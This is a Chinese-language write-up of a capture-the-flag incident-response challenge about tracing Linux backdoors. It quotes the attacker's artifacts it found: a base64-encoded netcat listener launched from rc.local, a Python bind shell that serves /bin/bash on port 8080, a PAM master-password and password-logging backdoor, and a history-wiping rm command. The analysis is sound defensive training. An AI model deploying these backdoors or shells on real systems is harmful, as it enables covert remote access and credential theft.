当前位置: 首页 > news >正文

应急响应:玄机_Linux后门应急

https://xj.edisec.net/challenges/95

11关做出拿到万能密码,ATMB6666,后面都在root权限下操作

1、主机后门用户名称:提交格式如:flag{backdoor}

cat /etc/passwd,发现后门用户

flag{backdoor}

2、主机排查项中可以发现到flag{}内以i开头的flag,如flag{ixxxxxxx}

ps -ef 发现flag{infoFl4g}

3、主机排查发现9999端口是通过哪个配置文件如何开机启动的,如/etc/crontab则填写/etc/crontab 的md5 ,提交方式示例:flag{md5}

/etc/rc.d/rc.local

echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
 

base64解码为:

while true;do nohup nc -lvp 9999 -c "flag{infoFl4g}" 2>&1 ;sleep 1;done;

flag{cf8a978fe83579e2e20ec158524d8c06}

4、黑客3s做了记录所有用户的每次登陆的密码的手段,flag为黑客记录的登陆密码日志路径md5,提交方式示例:flag{md5(路径)}

拉到本地IDA打开:/usr/lib/x86_64-linux-gnu/security/pam_unix.so

/tmp/.sshlog

flag{8997d5a1b8dcca5a4be75962250959f7} 

5、给出使用了/bin/bash 的RCE后门进程名称+端口号 如进程名称为sshd,端口号为22,则flag{sshd22}

逐一排查systemctl启动配置文件存放位置
/etc/systemd/system
/usr/lib/systemd/system 
/lib/systemd/system

ls -lat /etc/systemd/system发现可疑文件docker-compose-app.service

查看 内容

继续查看 

 base64解码

import socket, subprocess# Create socket object
s = socket.socket()
s.bind(('', 8080))
s.listen(1)# Continuously accept connections
while True:conn, addr = s.accept()try:# Launch bash shell connected to this socketsubprocess.call(['/bin/bash'], stdin=conn, stdout=conn, stderr=conn)finally:# Ensure the connection is closed after useconn.close()

后门代码,开启的8080端口

netstat -tunlp

flag{python38080}

6、找出开机启动的后门服务名称MD5,提交flag{md5(服务名)}

docker-compose-app.service

flag{5213e47de16522f1dc3f9e9ecc0ab8b0}

7、渗透提权获得root目录下的flag

cat /root/flag

flag{ATMB_root}

8、黑客3s埋了一个flag在权限维持过程中的地方,可以发现flag{}括号内的首字母是c开头,如flag{cxxxxxxx}

find / -type f -newermt '2024-09-24 01:30:00' ! -newermt '2024-09-24 23:31:00' 2>/dev/null|grep -v docker

找出指定时间修改过的文件,逐一排查

cat -A /var/spool/cron/crontabs/root,发现flag,加-A 参数

 flag{cr0nt4b_IRfind}

9、黑客3s做了一个root用户执行cat命令就删除文件的操作,请发现删除了什么文件将文件名作为flag提交

flag{./bash_history}

10、黑客3s很执着清理痕迹,并做了一个持续删痕迹的手段,请发现手段并给出删除的完整黑客删除命令的md5,如flag{md5(rm -f /var/log/ssh.log >/dev/stdout)} 

下载/home/user/Noral.so,IDA打开反编译

 rm -rf ~/.bash_history >/dev/null 2>&1

MD5:flag{b0f531b39d88d4f603fc89bd4dd2c0aa}

11、黑客3s设置了一个万能密码后门使得这一个万能密码可以以所有用户身份登陆,也不影响原来密码使用。请发现这个万能密码,提交flag格式为flag{万能密码} 

find / -name 'pam_unix.so' 2>/dev/null

拉到本地IDA打开:/usr/lib/x86_64-linux-gnu/security/pam_unix.so

发现万能密码:ATMB6666

flag{ATMB6666}

参考文章


后渗透之linux持久化控制技术
https://www.ddosi.org/post-exploitation-linux-persistence-techniques/

http://www.lryc.cn/news/488506.html

相关文章:

  • C++:捕获 shared_from_this()和捕获this的区别
  • 网络协议之TCP
  • 《澳鹏AI全景报告2024》分析最新的数据挑战
  • 【Java每日面试题】—— String、StringBuilder和StringBuffer的区别?
  • 【设计模式】【创建型模式(Creational Patterns)】之单例模式
  • form表单的使用
  • PDF内容提取,MinerU使用
  • SpringCloud篇(服务网关 - GateWay)
  • 自动化测试之unittest框架详解
  • Vue3 provide 和 inject的使用
  • 掌握Git分布式版本控制工具:从基础到实践
  • AndroidStudio与开发板调试时连接失败或APP闪退的解决方案,涉及SELINUX及获取Root权限
  • VMWARE虚拟交换机的负载平衡算法
  • 安卓InputDispatching Timeout ANR 流程
  • 【Nginx从入门到精通】03 、安装部署-让虚拟机可以联网
  • java 增强型for循环 详解
  • 浪潮云启操作系统(InLinux) bcache宕机问题分析
  • 038集——quadtree(CAD—C#二次开发入门)
  • 备赛蓝桥杯--算法题目(1)
  • 机器学习100道经典面试题库(二)
  • Unet++改进37:添加KACNConvNDLayer(2024最新改进方法)
  • 基于 Levenberg - Marquardt 法的 BP 网络学习改进算法详解
  • MySQL 8.0与PostgreSQL 15.8的性能对比
  • qt连接postgres数据库时 setConnectOptions函数用法
  • MySQL45讲 第二十七讲 主库故障应对:从库切换策略与 GTID 详解——阅读总结
  • JavaWeb笔记整理——Spring Task、WebSocket
  • 基于SpringBoot+RabbitMQ完成应⽤通信
  • Flutter踩坑记录(一)debug运行生成的项目,不能手动点击运行
  • React的hook✅
  • 2024.5 AAAiGLaM:通过邻域分区和生成子图编码对领域知识图谱对齐的大型语言模型进行微调